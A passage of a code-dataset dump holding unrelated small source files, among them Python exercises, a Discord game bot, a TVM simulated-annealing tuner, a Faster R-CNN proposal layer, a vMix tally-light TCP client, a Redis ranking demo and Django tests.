[]\n temp0 = temp1 = temp2 = temp3 = 'a'\n for i in range(0, 254):\n temp0 = str(lista[0])\n temp1 = str(lista[1])\n temp2 = str(lista[2])\n temp3 = str(i)\n lista_ips.append(temp0 + '.' + temp1 + '.' + temp2 + '.' 
+ temp3)\n return lista_ips\n\nip = str(input('Digite um IP: [xxx.xxx.xxx.xxx]'))\n#ip = str('128.1.0.1')\nlista = cortarIp(ip)\nlista = converterInteiro(lista)\nlista = criaIps(lista)\n\nfor c in range(len(lista)):\n print(lista[c])\n\n","sub_path":"Aulas-04-Soldyd/Exercicio/aula07.py","file_name":"aula07.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483676215","text":"\"\"\"\nPraticar tarefa de programação: Exercícios adicionais (opcionais)\n\nExercício 1\nEscreva um programa que receba um número inteiro positivo na entrada e verifique se é primo. Se o número for primo, imprima \"primo\". Caso contrário, imprima \"não primo\".\n\nExemplos:\n\nDigite um número inteiro: 13\nprimo\n\n----------------------------\n\nDigite um número inteiro: 12\nnão primo\n\"\"\"\n\n\ndef check_if_prime_number(number: int) -> bool:\n it_is_divisible = 0\n\n for index in range(1, number + 1):\n if number % index == 0:\n it_is_divisible += 1\n\n if it_is_divisible > 2:\n return False\n return True\n\n\nnumber = int(input(\"Digite um número inteiro e positivo: \"))\nresult = \"primo\" if check_if_prime_number(number) else \"não primo\"\n\nprint(f\"\\n{result}\")\n","sub_path":"FirstPart/Week4/Additional/PrintPrimeNumber.py","file_name":"PrintPrimeNumber.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"584198095","text":"from django.contrib import admin\n\nfrom wechat.models import WechatUser\n\n\n@admin.register(WechatUser)\nclass WechatUserAdmin(admin.ModelAdmin):\n list_display = ('slug', 'open_id', 'union_id', 'nickname', 'gender',)\n readonly_fields = ('slug', 'open_id', 'union_id', 'nickname', 'avatar_url', 'gender', 'city',\n 'province', 'country', 'oauth2_scope',)\n","sub_path":"server/wechat/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"498363818","text":"from discord.ext import commands\nfrom random import choice, randint, shuffle\nimport re\nfrom enum import Enum\n\nimport shared\nimport phasmorpg\n\nclass PhasmoTrait():\n def __init__(self, t_name, t_desc, t_dependencies):\n self.trait_name = t_name\n self.trait_desc = t_desc\n self.trait_dependencies = t_dependencies\n\n def conflict(self, lost_items):\n pass\n\n\nclass PhasmoItems(Enum):\n DOTS_PROJECTOR = 1\n EMF_READER = 2\n FLASHLIGHT = 3\n GHOST_WRITING_BOOK = 4\n SPIRIT_BOX = 5\n UV_LIGHT = 6\n VIDEO_CAMERA = 7\n CANDLE = 8\n CRUCIFIX = 9\n GLOWSTICK = 10\n HEAD_MOUNTED_CAMERA = 11\n LIGHTER = 12\n MOTION_SENSOR = 13\n PARABOLIC_MICROPHONE = 14\n PHOTO_CAMERA = 15\n SALT = 16\n SANITY_PILLS = 17\n SMUDGE_STICKS = 18\n SOUND_SENSOR = 19\n STRONG_FLASHLIGHT = 20\n THERMOMETER = 21\n TRIPOD = 22\n\nclass RockPaperScissors(Enum):\n \"\"\"Small class to handle rps game and emoji names\"\"\"\n ROCK = 1\n NEWSPAPER = 2\n SCISSORS = 3\n\nclass Games(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def pgame(self, ctx, num_traits:str, num_players:str=\"4\"):\n \"\"\"Khord gives custom RPG traits for Phasmo\"\"\"\n shared.log_command(ctx,f'pgame {num_traits} {num_players}')\n\n regex_passed_traits = regex_passed_players = None\n regex_passed_traits = re.search(\"^[1-9]{1}$\", num_traits)\n regex_passed_players = re.search(\"^[1-4]{1}$\", num_players)\n if not regex_passed_traits or 
not regex_passed_players:\n await ctx.send(f\"Invalid input. Usage: ;pgame number_of_traits(1-9) [number_of_players](1-4)\\n\")\n else:\n num_traits = int(num_traits)\n num_players = int(num_players)\n\n\n items_copy = phasmorpg.items.copy()\n for i in range(0,num_players):\n\n message = f\"```[PLAYER {i+1}]\\n + Traits:\\n\"\n\n traits = self.get_traits(num_traits)\n\n for trait in traits:\n message += f\"\\t{trait[0]} --- {trait[1]}\\n\"\n\n if [\"Forgetful\",\"Lose two random items from the mission\"] in traits:\n message += \" + Items Lost:\\n\"\n items_lost = self.get_items(items_copy)\n message += f\"\\t{items_lost[0]}\\n\\t{items_lost[1]}\\n\"\n\n message += f\" + (OPTIONAL) Personality: {self.get_personality()}\\n\"\n await ctx.send(f\"{message}```\")\n\n @commands.command()\n async def scissors(self, ctx):\n \"\"\"Challenge Khord with scissors\"\"\"\n shared.log_command(ctx,'scissors')\n\n result = self.rps_game(RockPaperScissors.SCISSORS)\n await ctx.send(result)\n\n @commands.command()\n async def paper(self, ctx):\n \"\"\"Challenge Khord with paper\"\"\"\n shared.log_command(ctx,'paper')\n\n result = self.rps_game(RockPaperScissors.NEWSPAPER)\n await ctx.send(result)\n\n @commands.command()\n async def rock(self, ctx):\n \"\"\"Challenge Khord with rock\"\"\"\n shared.log_command(ctx,'rock')\n\n result = self.rps_game(RockPaperScissors.ROCK)\n await ctx.send(result)\n\n\n def get_traits(self, count):\n \"\"\"Randomizes a copy of traits list, then pops desired amount for pgame\"\"\"\n traits = []\n c_copy = phasmorpg.traits.copy()\n shuffle(c_copy)\n for count in range(1, count+1):\n temp_index = randint(0,len(c_copy)-1)\n temp_trait = c_copy.pop(temp_index)\n traits.append(temp_trait)\n\n return traits\n\n def get_personality(self):\n \"\"\"Randomizes a personality for pgame\"\"\"\n return choice(phasmorpg.personalities)\n\n def get_items(self, items_copy):\n \"\"\"Randomizes 2 items for pgame\"\"\"\n items_gotten = []\n for item in range(0, 2):\n temp_index = randint(0,len(phasmorpg.items)-1)\n temp_item = items_copy.pop(temp_index)\n items_gotten.append(temp_item)\n return items_gotten\n\n def rps_game(self, player_choice):\n player_victory = False\n npc_choice = RockPaperScissors(randint(1,3))\n\n # Determine if player won\n if ((player_choice == RockPaperScissors.ROCK and npc_choice == RockPaperScissors.SCISSORS) or\n (player_choice == RockPaperScissors.SCISSORS and npc_choice == RockPaperScissors.NEWSPAPER) or\n (player_choice == RockPaperScissors.NEWSPAPER and npc_choice == RockPaperScissors.ROCK)):\n player_victory = True\n\n # Add player and bot choices to output statement\n outcome_statement = f\":{(player_choice.name).lower()}: ***vs*** :{(npc_choice.name).lower()}:\\n\"\n\n # Add victory/draw/loss result to output statement\n if player_victory:\n outcome_statement = outcome_statement + \"Purely luck, mortal. :white_check_mark:\"\n elif not player_victory and player_choice == npc_choice:\n outcome_statement += \"Hmm. Interesting. :monkey:\"\n else:\n outcome_statement += \"As expected from a feeble mind. You lose. 
:x:\"\n\n return (outcome_statement)","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"620446080","text":"# -*-encoding: utf-8-*-\nimport pickle\n\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\n\nmodel = pickle.load(open(\"difference.dat\", \"rb\"))\n\npath = 'data.csv'\n\ndata = pd.read_csv(path, header=None)\nx, y = data[list(range(15))], data[15]\nx.columns = ['我方本金', '我方利息', '资方本金', '资金方利息', '借款金额', '借款期数', '放款日期年', '放款日期月', '放款日期日', '首期应还款日年', '首期应还款日月',\n '首期应还款日日', '借款利率', '间隔天数', '是否足月', ]\n\nsource = xgb.DMatrix(x)\ny_pred = model.predict(source)\n\naccuracy = accuracy_score(y, y_pred)\n# 预测精准度: 99.22%\nprint(\"预测精准度: %.2f%%\" % (accuracy * 100.0))\n","sub_path":"day02/model_predict.py","file_name":"model_predict.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"385598760","text":"from setuptools import setup\n\nwith open('requirements.txt') as f:\n install_requires = f.read().strip().split('\\n')\n\nsetup(\n name=\"yaml2jupyterhub\",\n packages=[\"yaml2jupyterhub\"],\n install_requires=install_requires,\n include_package_data=True,\n entry_points={\n 'console_scripts': ['yaml2jupyterhub=yaml2jupyterhub.main:main'],\n },\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"620172013","text":"# -*- coding: utf-8 -*-\n# --------------------------------------------------------\n# Faster R-CNN\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick and Xinlei Chen\n# --------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nfrom lib.model.config import cfg\nfrom lib.model.bbox_transform import bbox_transform_inv, clip_boxes, bbox_transform_inv_tf, clip_boxes_tf\nfrom lib.model.nms_wrapper import nms\n\ndef proposal_layer(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride, anchors, num_anchors):\n \"\"\"A simplified version compared to fast/er RCNN\n For details please see the technical report\n \"\"\"\n if type(cfg_key) == bytes:\n cfg_key = cfg_key.decode('utf-8')\n pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N\n post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N\n nms_thresh = cfg[cfg_key].RPN_NMS_THRESH\n\n # Get the scores and bounding boxes\n scores = rpn_cls_prob[:, :, :, num_anchors:]\n rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))\n scores = scores.reshape((-1, 1))\n proposals = bbox_transform_inv(anchors, rpn_bbox_pred)\n proposals = clip_boxes(proposals, im_info[:2])\n\n # Pick the top region proposals\n order = scores.ravel().argsort()[::-1]\n if pre_nms_topN > 0:\n order = order[:pre_nms_topN]\n proposals = proposals[order, :]\n scores = scores[order]\n\n # Non-maximal suppression\n keep = nms(np.hstack((proposals, scores)), nms_thresh)\n\n # Pick th top region proposals after NMS\n if post_nms_topN > 0:\n keep = keep[:post_nms_topN]\n proposals = proposals[keep, :]\n scores = scores[keep]\n\n # Only support single image as input\n batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)\n blob = np.hstack((batch_inds, proposals.astype(np.float32, 
copy=False)))\n\n  return blob, scores\n\n\ndef proposal_layer_tf(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride, anchors, num_anchors):\n  if type(cfg_key) == bytes:\n    cfg_key = cfg_key.decode('utf-8')\n  pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N\n  post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N\n  nms_thresh = cfg[cfg_key].RPN_NMS_THRESH\n\n  \"\"\"\n  Get the scores and bounding boxes\n  Take every anchor's probability of being an object. Continuing the example inside _region_proposal, the scores obtained here should be:\n  array([[[[0.88079708, 0.88079708],\n        [0.88079708, 0.88079708]],\n        [[0.88079708, 0.88079708],\n        [0.88079708, 0.88079708]]]])\n  The shape is (1, 2, 2, 2), i.e. each row holds the 'is an object' probabilities of the two anchors at one pixel.\n  \"\"\"\n  scores = rpn_cls_prob[:, :, :, num_anchors:]\n\n  \"\"\"\n  Reshape scores to one dimension; scores become:\n  array([0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708, 0.88079708])\n  \"\"\"\n  scores = tf.reshape(scores, shape=(-1,))\n\n  \"\"\"\n  Continuing the example inside _region_proposal, reshape rpn_bbox_pred:\n  array([[0., 0., 0., 0.],\n         [0., 0., 0., 0.],\n         [0., 0., 0., 0.],\n         [0., 0., 0., 0.],\n         [0., 0., 0., 0.],\n         [0., 0., 0., 0.],\n         [0., 0., 0., 0.],\n         [0., 0., 0., 0.]])\n  The shape is (8, 4); each row is the offset of a predicted box's center coordinates and width/height relative to its anchor box after RPN regression -- see bbox_transform_inv_tf in\n  bbox_transform for the details.\n  \"\"\"\n  rpn_bbox_pred = tf.reshape(rpn_bbox_pred, shape=(-1, 4))\n\n  \"\"\"\n  Here anchors are the coordinates of all anchor boxes obtained by mapping the feature-map pixels back onto the original image; the shape matches rpn_bbox_pred. Suppose the anchors are:\n  array([[ 0, 0, 2, 2],\n        [ 4, 4, 6, 6],\n        [ 8, 8, 10, 10],\n        [12, 12, 14, 14],\n        [16, 16, 18, 18],\n        [20, 20, 22, 22],\n        [24, 24, 26, 26],\n        [28, 28, 30, 30]])\n  Again the shape is (8, 4); each row describes one original anchor.\n  After the computation, the predicted box coordinates come out as:\n  array([[ 0., 0., 3., 3.],\n        [ 4., 4., 7., 7.],\n        [ 8., 8., 11., 11.],\n        [12., 12., 15., 15.],\n        [16., 16., 19., 19.],\n        [20., 20., 23., 23.],\n        [24., 24., 27., 27.],\n        [28., 28., 31., 31.]])\n  The shape is (8, 4). The offsets were all set to 0, so why do the predicted boxes differ slightly from the anchor boxes? Analysis shows the\n  center-coordinate computation in bbox_transform_inv_tf is slightly off, though the impact is probably small.\n  \"\"\"\n  proposals = bbox_transform_inv_tf(anchors, rpn_bbox_pred)\n\n  \"\"\"\n  From minibatch.py, im_info consists of three numbers: the height, the width and the scale factor.\n  The predicted box coordinates obtained above must be kept inside the image, so they are compared against the width and height:\n  every x coordinate must satisfy\n  0 <= x <= w\n  every y coordinate must satisfy\n  0 <= y <= h\n  \"\"\"\n  proposals = clip_boxes_tf(proposals, im_info[:2])\n\n  \"\"\"\n  Non-maximal suppression\n  Use non-maximum suppression to thin out predicted boxes that overlap heavily; see the readme under lib/nms/ for the algorithm.\n  \"\"\"\n  indices = tf.image.non_max_suppression(proposals, scores, max_output_size=post_nms_topN, iou_threshold=nms_thresh)\n\n  \"\"\"\n  Cut proposals and scores down to the predicted-box indices that non-maximum suppression decided to keep.\n  \"\"\"\n  boxes = tf.gather(proposals, indices)\n  boxes = tf.to_float(boxes)\n  scores = tf.gather(scores, indices)\n  scores = tf.reshape(scores, shape=(-1, 1))\n\n  \"\"\"\n  Only support single image as input\n  A column of zeros is prepended to the predicted boxes; what this leading zero column (the batch index) is for becomes clear further downstream.\n  \"\"\"\n  batch_inds = tf.zeros((tf.shape(indices)[0], 1), dtype=tf.float32)\n  blob = tf.concat([batch_inds, boxes], 1)\n\n  return blob, scores\n\n\n","sub_path":"lib/layer_utils/proposal_layer.py","file_name":"proposal_layer.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"633535725","text":"import autotvm\nimport random\nimport numpy as np\nimport logging\nfrom functools import reduce\nfrom autotvm.tuner.tuner import Tuner\n\nclass SATuner(Tuner):\n    def __init__(self, task, pool, total, shrink=0.9, T=None, target=None):\n        super(SATuner, self).__init__(task)\n\n        self.space = task.config_space\n        self.pool_size = pool\n        self.total = total\n        self.shrink = shrink\n\n        vals = self.space.space_map.values()\n\n        self.dims = [len(i) for i in vals] + [1]\n        self.n_dims = len(vals)\n        if T is None:\n            self.originT = self.T = np.sqrt(sum(i * i for i in self.dims)) / pool\n        else:\n            self.originT = self.T = T\n        self.N = reduce(int.__mul__, self.dims)\n\n        self.visited = set([])\n\n        self.pool = []\n        self.exec_pool = []\n        for i in range(pool):\n            temp = random.randint(0, self.N - 1)\n            while temp in self.visited:\n                temp = random.randint(0, self.N - 1)\n            self.pool.append((temp, 0))\n            self.exec_pool.append(temp)\n            self.visited.add(temp)\n\n            vec = self._i_to_vec(temp)\n            #print temp\n            #print vec\n            #print self._vec_to_i(vec)\n\n        self.cur = 0\n        self.better = False\n\n\n    def next_batch(self, batch_size):\n        res = []\n        for i in range(self.cur, min(self.pool_size, self.cur + batch_size)):\n            res.append(self.space.get(self.exec_pool[i]))\n            self.cur += 1\n        return res\n\n    def has_next(self):\n        return len(self.visited) - (self.pool_size - self.cur) < self.total and self.T > 1.0\n\n    def update(self, inputs, results):\n        n = len(inputs)\n        assert n == len(results)\n        for i in range(self.cur - n, self.cur):\n            _i = i - self.cur + n\n            inp = inputs[_i]\n            res = results[_i]\n            sol, old_score = self.pool[i]\n            if res.error_no == 0:\n                new_score = inp.task.flop / np.mean(res.costs) / 2.5e12\n            else:\n                new_score = 0.0\n            if new_score > old_score:\n                logging.log(logging.INFO, '%f is better than %f' % (new_score, old_score))\n                self.pool[i] = (self.exec_pool[i], new_score)\n                self.better = True\n            elif random.random() < np.exp(-(old_score - new_score) * self.originT / self.T):\n                per = np.exp(-(old_score - new_score) * self.originT / self.T)\n                logging.log(logging.INFO, '%.2f%% accept a bad score %f (%f)' % (per * 100.0, new_score, old_score))\n                self.pool[i] = (self.exec_pool[i], new_score)\n\n        if self.cur >= self.pool_size:\n            if self.better:\n                self.T *= self.shrink\n
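                # Geometric cooling: after k cooled rounds T = T0 * shrink**k, so\n                # with the default shrink=0.9 ten coolings leave T at roughly\n                # 0.35 * T0 (0.9**10 ~= 0.349).\n                logging.log(logging.INFO, 'Current 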
Temperature: %f' % self.T)\n                self.better = False\n\n            self.cur = 0\n            for i in range(self.pool_size):\n                sol, _ = self.pool[i]\n\n                def _explore(sol):\n                    vec = self._i_to_vec(sol)\n                    T = self.T\n                    for j in range(self.n_dims - 1):\n                        angle = (random.random() * np.pi * 2)\n                        vec[j] = (vec[j] + int(self.T * np.cos(angle))) % self.dims[j]\n                        T *= np.sin(angle)\n                    vec[-1] = (vec[-1] + int(T)) % self.dims[-1]\n                    return self._vec_to_i(vec)\n\n                temp = _explore(sol)\n                while temp in self.visited:\n                    temp = _explore(temp)\n                self.exec_pool[i] = temp\n                self.visited.add(temp)\n    \n\n    def _i_to_vec(self, num):\n        # Mixed-radix decode of a flat config index into one digit per knob.\n        res = []\n        for i in range(self.n_dims - 1, -1, -1):\n            res.append(num % self.dims[i])\n            num //= self.dims[i]\n        res.reverse()\n        return res\n\n    def _vec_to_i(self, vec):\n        # Mixed-radix encode; the inverse of _i_to_vec.\n        res = 0\n        for i in range(self.n_dims):\n            res = res * self.dims[i] + vec[i]\n        return res\n\n","sub_path":"tvm-auto/sa.py","file_name":"sa.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429884664","text":"#!/usr/bin/env python\n\"\"\"\nFinds \"all\" the peaks in an image.\n\nHazen 01/14\n\"\"\"\nimport numpy\n\nimport storm_analysis.sa_library.analysis_io as analysisIO\nimport storm_analysis.sa_library.fitting as fitting\nimport storm_analysis.sa_library.dao_fit_c as daoFitC\n\ndef initFindAndFit(parameters):\n    \"\"\"\n    Return the appropriate type of finder and fitter.\n    \"\"\"\n    fmodel = parameters.getAttr(\"model\")\n    \n    # Create peak finder.\n    finder = fitting.PeakFinderGaussian(parameters = parameters)\n\n    # Initialize Z fitting parameters.\n    wx_params = None\n    wy_params = None\n    min_z = None\n    max_z = None\n    if (parameters.getAttr(\"model\", \"na\") == \"Z\"):\n        [wx_params, wy_params] = parameters.getWidthParams(for_mu_Zfit = True)\n        [min_z, max_z] = parameters.getZRange()\n\n    # Check for camera calibration (this function is also used by sCMOS analysis).\n    variance = None\n    if parameters.hasAttr(\"camera_calibration\"):\n        \n        # Load variance, scale by gain.\n        #\n        # Variance is in units of ADU*ADU.\n        # Gain is ADU/photo-electron.\n        #\n        [offset, variance, gain] = analysisIO.loadCMOSCalibration(parameters.getAttr(\"camera_calibration\"))\n        variance = variance/(gain*gain)\n\n        # Set variance in the peak finder, this method also pads the\n        # variance to the correct size.\n        variance = finder.setVariance(variance)\n        \n    # Create C fitter object.\n    fitters = {'2dfixed' : daoFitC.MultiFitter2DFixed,\n               '2d' : daoFitC.MultiFitter2D,\n               '3d' : daoFitC.MultiFitter3D,\n               'Z' : daoFitC.MultiFitterZ}\n    mfitter = fitters[fmodel](roi_size = finder.getROISize(),\n                              scmos_cal = variance,\n                              wx_params = wx_params,\n                              wy_params = wy_params,\n                              min_z = min_z,\n                              max_z = max_z)\n\n    # Create peak fitter.\n    fitter = fitting.PeakFitter(mfitter = mfitter,\n                                parameters = parameters)\n\n    # Specify which properties we want from the analysis.\n    properties = [\"background\", \"error\", \"height\", \"iterations\", \"significance\", \"sum\", \"x\", \"y\"]\n    if (fmodel == \"2dfixed\") or (fmodel == \"2d\"):\n        properties.append(\"xsigma\")\n    elif (fmodel == \"3d\"):\n        properties.append(\"xsigma\")\n        properties.append(\"ysigma\")\n    elif (fmodel == \"Z\"):\n        properties.append(\"xsigma\")\n        properties.append(\"ysigma\")\n        properties.append(\"z\")\n\n    return fitting.PeakFinderFitter(peak_finder = finder,\n                                    peak_fitter = fitter,\n                                    properties = properties)\n\n
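# For orientation, a sketch of what the dispatch above selects for the '3d'\n# model (names as used in this file; arguments abbreviated):\n#   mfitter = daoFitC.MultiFitter3D(roi_size=finder.getROISize(), ...)\n#   properties == [..., 'x', 'y', 'xsigma', 'ysigma']\n#\n# The MIT License\n#\n# Copyright (c) 2016 Zhuang Lab, Harvard University\n#\n# Permission is hereby granted, free of charge, to any 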
person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n","sub_path":"storm_analysis/daostorm_3d/find_peaks.py","file_name":"find_peaks.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"491951893","text":"# @author Danja Verburg\n# Starts a socket and thread connected to vMix over TCP. A message is sent to vMix\n# and the response is processed via a GET request to app.py\n\nimport socket\nfrom socket import error as socket_error\nimport threading\nimport requests\n\nTCP_IP = '127.0.0.1'\nTCP_PORT = 8099\nMSG_SIZE = 1024\napi_url = 'http://127.0.0.1:5000'\n\n# Create the TCP/IP socket\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket.connect((TCP_IP, TCP_PORT))\n\n\ndef get_data(socket):\n    while True:\n        try:\n            data = socket.recv(MSG_SIZE)\n            data = str(data)\n            antwoord = data.split(' ')\n            tallyIndex(antwoord[2])\n\n            if not data:\n                break\n        except socket_error as e:\n            print(e)\n            break\n\n\n# Create a thread for the socket connection\niThread = threading.Thread(target=get_data, args=(socket,))\niThread.start()\nprint(\"Connected...\")\n\n\ndef tallyIndex(response):\n    try:\n        # check how many tally lights are connected and forward this to app.py\n        tallyAAN = api_url + '/tallyAAN={}'.format(response)\n        print(tallyAAN.split(\"\\\\\")[0])\n        switch = requests.get(tallyAAN)\n        # Check which tally light is live and forward this to app.py\n        for i in range(len(response)):\n            if response.index(\"1\") == i:\n                url = api_url + '/tally={}'.format(i)\n                tally = requests.get(url)\n                print(i)\n\n    except Exception as e:\n        print(e)\n    finally:\n        print(response)\n        return response\n\n\nsocket.send(bytes(\"SUBSCRIBE TALLY\\r\\n\", encoding='utf8'))\n","sub_path":"VmixConnectie&GUI/VmixTallyLight.py","file_name":"VmixTallyLight.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"241242171","text":"import redis\n\nr = redis.Redis()\n\n# add 8 songs to the sorted set\nr.zadd('ranking', {'song1': 1, 'song2': 1, 'song3': 1, 'song4': 1})\nr.zadd('ranking', {'song5': 1, 'song6': 1, 'song7': 1, 'song8': 1})\n# increase the scores of specific members\nr.zincrby('ranking', 50, 'song3')\nr.zincrby('ranking', 60, 'song4')\nr.zincrby('ranking', 70, 'song8')\n# get the top 3: [('song8', 71), (), ()]\n\n#\nrank_list = r.zrevrange('ranking', 0, 2, withscores=True)\n\ni = 1\nfor rank in rank_list:\n    print(\"No.{}: {}, score {}\".format(i, rank[0].decode(), int(rank[1])))\n
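    # The manual counter could equally be an enumerate loop (a sketch; redis-py\n    # returns (member, score) tuples when withscores=True):\n    #   for i, (member, score) in enumerate(rank_list, start=1):\n    #       print('No.{}: {}, score {}'.format(i, member.decode(), int(score)))\n    i += 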
","sub_path":"part_04.1_redis/day03/02_mobile.py","file_name":"02_mobile.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494861166","text":"import cv2\nfrom djitellopy import tello\n\ntello = tello.Tello()\ntello.connect()\nbattery_level = tello.get_battery()\nprint(battery_level)\ntello.streamon()\n\ndef findFace(img):\n    faceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n    imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    faces = faceCascade.detectMultiScale(imgGray, 1.2, 8)\n\n    myFaceListC = []\n    myFaceListArea = []\n\n    for (x, y, w, h) in faces:\n        cv2.rectangle(img, (x,y), (x+w, y+h), (0,0,255), 2)\n        cx = x + w // 2\n        cy = y + h // 2\n        area = w * h\n        cv2.circle(img, (cx, cy),10,(0,255,0), 6)\n        myFaceListC.append([cx,cy])\n        myFaceListArea.append(area)\n        # print(myFaceListC)\n    if len(myFaceListArea) != 0:\n        i= myFaceListArea.index(max(myFaceListArea))\n        return img, [myFaceListC[i],myFaceListArea[i]]\n    else:\n        return img, [[0,0],0]\n\nwhile True:\n    img = tello.get_frame_read().frame\n    img = cv2.resize(img, (360, 240))\n\n    img, info = findFace(img)\n    cv2.imshow('frame',img)\n    if cv2.waitKey(5) & 0xFF == ord('q'):\n        break\n\n# Release everything if job is finished\n# cap.release()\n# out.release()\ncv2.destroyAllWindows()\n","sub_path":"Day04/findFaceTello02.py","file_name":"findFaceTello02.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"213677221","text":"import re \r\ndef first(text): # function for task one\r\n    print(\"input text: \", text) \r\n    # keep only Latin/Cyrillic letters and spaces\r\n    reg = re.compile('[^a-zA-Zа-яА-Я ]')\r\n    text1 = reg.sub('', text)\r\n    #text.replace('.')\r\n    print(text1)\r\n    Broke=text1.split() # split the text into a list of words\r\n    k=len(Broke) # length of the list\r\n    list_three=[] # create a list\r\n    for i in range(k):\r\n        if len(Broke[i])==3: \r\n            list_three.append(Broke[i]) # collect every word with exactly 3 letters\r\n    print(\"words with 3 letters: \",\" \".join(list_three)) # print the result\r\nfirst(input(str(\"enter text: \"))) # run task one\r\n\r\ndef second(text_a): # function for task two\r\n    print(\"input text: \", text_a)\r\n    reg = re.compile('[^a-zA-Zа-яА-Я ]')\r\n    text_a = reg.sub('', text_a)\r\n    words = text_a.split()# split the sentence into a list of words\r\n    new = [] # create a new list\r\n    for i in range(len(words)): # loop over the list\r\n        word=words[i][::-1] # reverse the word\r\n        new.append(word) # append the reversed word to the new list\r\n        new.append(str('.')) # add back the removed character\r\n    print(\"answer:\",'\\n', ' '.join(new)) # print the result\r\nsecond(str(input(\"enter the encoded text: \"))) # run task two\r\ninput()\r\n","sub_path":"lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"523169860","text":"from django.urls import resolve\nfrom django.test import TestCase\nfrom django.http import HttpRequest\nfrom .views import home_page\nfrom django.template.loader import render_to_string\nfrom .models import Item, List\n\n\nclass HomePageTest(TestCase):\n\n    def test_root_url_resolves_to_home_page_view(self):\n        found = resolve('/')\n        self.assertEqual(found.func, home_page)\n\n    def test_home_page_returns_correct_html(self):\n        request = HttpRequest()\n        
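# Calling the view function directly (instead of going through the test\n        # client) bypasses URL routing and middleware; render_to_string below\n        # rebuilds the HTML the view is expected to produce.\n        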
response = home_page(request)\n        expected_html = render_to_string('home.html', request=request)\n        # self.assertEqual(response.content.decode('UTF-8'), expected_html)\n        # print('response.content.decode()\\n', response.content.decode())\n        # print('expected_html\\n', expected_html)\n\n\nclass ListAndItemModelsTest(TestCase):\n\n    def test_saving_and_retrieving_items(self):\n        list_ = List()\n        list_.save()\n\n        first_item = Item()\n        first_item.text = 'The first (ever) list item'\n        first_item.list = list_\n        first_item.save()\n\n        second_item = Item()\n        second_item.text = 'Item the second'\n        second_item.list = list_\n        second_item.save()\n\n        saved_list = List.objects.first()\n        self.assertEqual(saved_list, list_)\n\n        saved_item = Item.objects.all()\n        self.assertEqual(saved_item.count(), 2)\n\n        first_saved_item = saved_item[0]\n        second_saved_item = saved_item[1]\n\n        self.assertEqual(first_saved_item.text, 'The first (ever) list item')\n        self.assertEqual(first_saved_item.list, list_)\n        self.assertEqual(second_saved_item.text, 'Item the second')\n        self.assertEqual(second_saved_item.list, list_)\n\n\nclass ListViewTest(TestCase):\n\n    def test_uses_list_template(self):\n        list_ = List.objects.create()\n        response = self.client.get('/lists/%d/' % (list_.id,))\n        